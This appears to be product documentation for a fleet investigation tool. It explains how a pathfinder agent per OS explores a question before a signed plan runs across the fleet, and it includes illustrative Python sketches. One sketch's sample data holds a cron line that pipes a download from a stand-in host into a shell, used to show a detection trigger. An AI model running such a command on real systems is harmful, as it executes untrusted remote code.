Pathfinder vs fleet agents

When you submit an investigation, Puck sends one agent per target OS ahead to explore the question in depth, then compiles what it learned into a deterministic plan that the rest of the fleet executes in parallel.

This is an Enterprise feature. OSS has the same “exploration before fleet-wide execution” idea conceptually, but it’s driven by your AI client (Claude Code, Cursor) calling puck_investigate against one host first and then puck_query_fleet for the rest — no brain-side pathfinder service.

Why it exists

Running a full multi-turn LLM conversation on every endpoint in your fleet would be slow and expensive. If each agent in a 200-agent fleet ran its own five-iteration conversation, that would be a thousand LLM round-trips before a single finding was classified.
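
The arithmetic behind that figure can be sketched as follows. This is an illustration only: it counts one round-trip per iteration, as the paragraph above does, and leaves out the plan-compilation call. The function name and return keys are made up for this example.

```python
def llm_round_trips(fleet_size: int, iterations: int, pathfinders: int = 1) -> dict:
    """Compare LLM round-trips for the two approaches (iterations only)."""
    # Every endpoint runs its own multi-turn conversation.
    per_agent = fleet_size * iterations
    # Only the pathfinder hosts talk to the LLM; the fleet runs a compiled plan.
    pathfinder_split = pathfinders * iterations
    return {"per_agent": per_agent, "pathfinder_split": pathfinder_split}


print(llm_round_trips(fleet_size=200, iterations=5))
# {'per_agent': 1000, 'pathfinder_split': 5}
```

With one pathfinder per target OS, the second number scales with the number of operating systems in scope, not with the size of the fleet.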

The split exists because exploration and execution are different problems. Exploration is creative: it requires a model that can reason about what it found, decide what to check next, and follow unexpected threads. Execution is mechanical: it requires agents that consistently run the same steps and report back reliably. Paying for exploration on every agent wastes money; running execution through an LLM loop sacrifices reliability.

The pathfinder phase answers “what should we look for?” The fleet phase answers “is it here, on every machine?”

How it works

flowchart LR
    Q[Query] --> PF[Pathfinder agent\none per OS]
    PF -->|multi-turn LLM| TSCR[Pathfinder\ntranscript]
    TSCR --> BR[Blast radius\ndecision]
    BR -->|TARGETED or FLEET_WIDE| PLAN[Compiled\nsigned plan]
    PLAN --> F1[Fleet agent 1]
    PLAN --> F2[Fleet agent 2]
    PLAN --> FN[Fleet agent N]
    BR -->|NO_ACTION| RPT[Report from\npathfinder only]
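
The branch at the blast-radius node in the diagram above can be read as a small dispatch. The three decision values come from the diagram; the stage labels returned here are hypothetical names chosen for this sketch, not identifiers from Puck.

```python
from enum import Enum


class BlastRadius(Enum):
    NO_ACTION = "NO_ACTION"
    TARGETED = "TARGETED"
    FLEET_WIDE = "FLEET_WIDE"


def next_stage(decision: BlastRadius) -> str:
    """Return the stage that follows the blast-radius decision."""
    if decision is BlastRadius.NO_ACTION:
        # Nothing is distributed; the report comes from the pathfinder alone.
        return "report_from_pathfinder"
    # TARGETED and FLEET_WIDE both lead to a compiled, signed plan.
    return "compile_and_sign_plan"


for decision in BlastRadius:
    print(decision.value, "->", next_stage(decision))
```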

Pathfinder: The brain selects one idle agent per target OS from the connected fleet — preferring the longest-connected non-stale agent. That agent enters a multi-turn exploration loop with the brain’s LLM, with a default cap of five iterations. Each iteration asks the LLM to request a set of commands, runs them on the pathfinder host, and feeds the results back for a review turn. The loop exits when the LLM reaches a confidence of at least 0.6 with no remaining gaps, or when the iteration cap is hit. The full transcript — including what was found, what was decided, and why — is preserved as an artifact.
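
A minimal sketch of the selection rule and the exploration loop described above. The `Agent` and `Review` types, their field names, and the three callables are assumptions made for illustration. The sketch also simply skips stale agents, which may be stricter than the brain's actual preference logic.

```python
from dataclasses import dataclass


@dataclass
class Agent:
    agent_id: str
    os: str
    connected_seconds: float
    idle: bool
    stale: bool


@dataclass
class Review:
    confidence: float
    gaps: list


def select_pathfinders(agents):
    """Pick one idle, non-stale agent per OS, preferring the longest-connected."""
    chosen = {}
    for agent in agents:
        if not agent.idle or agent.stale:
            continue
        best = chosen.get(agent.os)
        if best is None or agent.connected_seconds > best.connected_seconds:
            chosen[agent.os] = agent
    return chosen


def explore(request_commands, run_on_host, review,
            max_iterations=5, min_confidence=0.6):
    """Run the request/run/review loop until confident with no gaps, or capped."""
    transcript = []
    for iteration in range(1, max_iterations + 1):
        commands = request_commands(transcript)   # LLM asks for commands
        results = run_on_host(commands)           # pathfinder host runs them
        verdict = review(transcript, results)     # LLM review turn
        transcript.append({
            "iteration": iteration,
            "commands": commands,
            "results": results,
            "confidence": verdict.confidence,
            "gaps": verdict.gaps,
        })
        if verdict.confidence >= min_confidence and not verdict.gaps:
            break
    return transcript


agents = [
    Agent("a1", "linux", 3600, idle=True, stale=False),
    Agent("a2", "linux", 7200, idle=True, stale=True),
    Agent("a3", "linux", 5400, idle=True, stale=False),
    Agent("a4", "windows", 100, idle=False, stale=False),
    Agent("a5", "windows", 50, idle=True, stale=False),
]
picked = select_pathfinders(agents)
print({os_name: a.agent_id for os_name, a in picked.items()})
# {'linux': 'a3', 'windows': 'a5'}

# Stubbed LLM reviews: the second is confident but still has a gap.
reviews = iter([
    Review(0.3, ["persistence"]),
    Review(0.7, ["persistence"]),
    Review(0.8, []),
])
transcript = explore(
    request_commands=lambda t: ["uname -a"],
    run_on_host=lambda cmds: {c: "stub output" for c in cmds},
    review=lambda t, r: next(reviews),
)
print(len(transcript))  # 3
```

The second stubbed review clears the 0.6 threshold but still lists a gap, so the loop continues to a third iteration. Both conditions have to hold for an early exit.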

Plan compilation: If the blast-radius decision calls for fleet distribution, the pathfinder transcript becomes the input to the plan compiler. The compiler asks a standard-tier LLM to produce a Plan JSON: a sequence of steps with conditional branches, anomaly weights, and deviation triggers. The brain re-asserts the investigation ID (the LLM-supplied value is not trusted), signs the plan with Ed25519, and distributes it.
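
The re-assert-then-sign step might look roughly like this. The field names (`investigation_id`, `steps`) and the envelope shape are assumptions, not the real Plan JSON schema. To keep the example runnable with the standard library only, the demo signer is an HMAC stand-in and is explicitly not Ed25519. A real signer would be an Ed25519 private key, for example `Ed25519PrivateKey.sign` from the `cryptography` package.

```python
import hashlib
import hmac
import json
from typing import Callable


def finalize_plan(llm_plan: dict, investigation_id: str,
                  sign: Callable[[bytes], bytes]) -> dict:
    """Overwrite the LLM-supplied investigation ID, then sign canonical bytes."""
    plan = dict(llm_plan)
    # The LLM-supplied value is not trusted, so the trusted ID replaces it.
    plan["investigation_id"] = investigation_id
    # Canonical serialization so signer and verifier hash identical bytes.
    payload = json.dumps(plan, sort_keys=True, separators=(",", ":")).encode("utf-8")
    return {"plan": plan, "signature": sign(payload).hex()}


def demo_sign(payload: bytes) -> bytes:
    # Stand-in for illustration only: HMAC-SHA256, NOT Ed25519.
    return hmac.new(b"demo-only-key", payload, hashlib.sha256).digest()


llm_output = {"investigation_id": "spoofed-by-llm", "steps": []}
signed = finalize_plan(llm_output, "inv-123", demo_sign)
print(signed["plan"]["investigation_id"])  # inv-123
```

Overwriting the ID before serialization means the signature covers the trusted value, so a plan cannot be replayed under a different investigation without invalidating the signature.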

Fleet execution: Fleet agents are deterministic. They poll for plans, verify the Ed25519 signature before running anything, execute steps in order through Tier 1 (scripted) and Tier 2 (conditional branches using template variables from prior steps), and call home to the brain (Tier 3) only when a deviation trigger fires on something unexpected. No LLM runs on the fleet agent. No round-trips between steps. The agent just executes the plan and posts results.
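
The three tiers can be sketched as a single loop. Everything here is hypothetical: the step fields (`id`, `command`, `when`, `deviation_if_contains`), the commands, and the callables are invented for illustration, and the real plan schema will differ. Signature checking is delegated to a `verify` callable, which in the demo is a trivial stand-in instead of an Ed25519 check.

```python
from string import Template


def run_plan(envelope, verify, run, call_home):
    """Verify the plan, then execute its steps in order with no LLM involved."""
    if not verify(envelope):
        raise PermissionError("plan signature did not verify; refusing to run")
    variables, results = {}, []
    for step in envelope["plan"]["steps"]:
        # Tier 2: conditional branch on the output of a prior step.
        cond = step.get("when")
        if cond and variables.get(cond["var"]) != cond["equals"]:
            continue
        # Tier 2: template variables filled in from prior step outputs.
        command = Template(step["command"]).safe_substitute(variables)
        output = run(command)  # Tier 1: scripted execution
        variables[step["id"]] = output
        results.append({"id": step["id"], "command": command, "output": output})
        # Tier 3: call home only when a deviation trigger fires.
        trigger = step.get("deviation_if_contains")
        if trigger and trigger in output:
            call_home(step["id"], output)
    return results


envelope = {
    "signature": "demo-signature",
    "plan": {"steps": [
        {"id": "kernel", "command": "uname -r"},
        {"id": "modules", "command": "check-modules --kernel $kernel",
         "when": {"var": "kernel", "equals": "6.1.0"}},
        {"id": "legacy", "command": "check-legacy",
         "when": {"var": "kernel", "equals": "5.4.0"}},
        {"id": "cron", "command": "list-cron", "deviation_if_contains": "curl"},
    ]},
}
outputs = {  # canned outputs standing in for real command execution
    "uname -r": "6.1.0",
    "check-modules --kernel 6.1.0": "ok",
    "list-cron": "*/5 * * * * curl http://example.invalid | sh",
}
escalations = []
results = run_plan(
    envelope,
    verify=lambda env: env["signature"] == "demo-signature",  # stand-in check
    run=lambda command: outputs[command],
    call_home=lambda step_id, output: escalations.append(step_id),
)
print([r["id"] for r in results])  # ['kernel', 'modules', 'cron']
print(escalations)                 # ['cron']
```

The `legacy` step is skipped because its condition does not match, and only the `cron` step escalates. Every other step completes without contacting the brain.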

When you’d touch it

Most of the time you don’t. The pathfinder-fleet split is automatic.

Two tag policy fields give you influence over the pathfinder phase on specific agents:

max_pathfinder_turns: caps the iteration count for investigations in which a tagged agent serves as pathfinder. Use this on expensive or sensitive hosts where you want shorter explorations.
extra_system_prompt: appended to the pathfinder system prompt as a ## Host context (operator policy) section. Use this to give the pathfinder agent context about the host’s role (“this is a CI runner, so ignore build artifact paths”).

Both are set in Console → Settings → Tag policies and apply based on the labels the agent carries at install time.
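
As a rough sketch of how the two fields could take effect for a single matching policy: the dictionary shape and function name below are assumptions, and how Puck combines several matching policies is not covered here. Only the two field names, the section heading, and the default of five iterations come from this page.

```python
DEFAULT_MAX_TURNS = 5  # default iteration cap described earlier on this page


def apply_tag_policy(base_prompt: str, policy: dict):
    """Return (system_prompt, max_turns) after applying one tag policy."""
    max_turns = policy.get("max_pathfinder_turns", DEFAULT_MAX_TURNS)
    prompt = base_prompt
    extra = policy.get("extra_system_prompt")
    if extra:
        # Operator text is appended under its own heading.
        prompt += "\n\n## Host context (operator policy)\n" + extra
    return prompt, max_turns


prompt, max_turns = apply_tag_policy(
    "You are the pathfinder.",  # placeholder base prompt
    {
        "max_pathfinder_turns": 3,
        "extra_system_prompt": "this is a CI runner, so ignore build artifact paths",
    },
)
print(max_turns)  # 3
print(prompt)
```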
